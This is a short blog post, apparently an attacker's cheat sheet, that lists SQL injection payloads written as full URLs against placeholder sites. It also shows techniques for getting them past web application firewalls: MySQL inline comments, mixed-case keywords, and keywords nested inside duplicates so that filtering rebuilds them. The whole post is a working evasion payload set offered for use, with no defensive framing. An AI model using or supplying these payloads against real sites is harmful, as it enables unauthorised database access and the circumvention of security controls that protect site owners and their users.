
Sqli
http://xyz.com/detail.php?id=44 union all select 1,2,3,4,5— -
By passed Sqli
http://xyz.com/detailphp?id=44 /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3,4,5— -
By Function Capitalization:-
Some Web Application Firewalls will filter only lowercase alphabets, So we can easily bypass by case changing.
Actual query
http://xyz.com/detail.php?id=44 UNION SELECT 1,2,3,4,5—
Query to bypass the WAF
http://xyz.com/detail.php?id=-1 uniOn SeLeCt 1,2,3,4,5—
By Replaced Keywords:-
Some WAF's will escape certain keywords such as UNION, SELECT, ORDER BY, etc. This can be used to our advantage by duplicating the detected word within another.
Actual query
http://vulnerablesite.com/detail.php?id=-1 UNION SELECT 1,2,3,4,5—
Query to bypass the WAF
http://vulnerablesite.com/detail.php?id=-1 UNIunionON SEselectLECT 1,2,3,4,5-- -
0 comments:
Post a comment
Note: only a member of this blog may post a comment.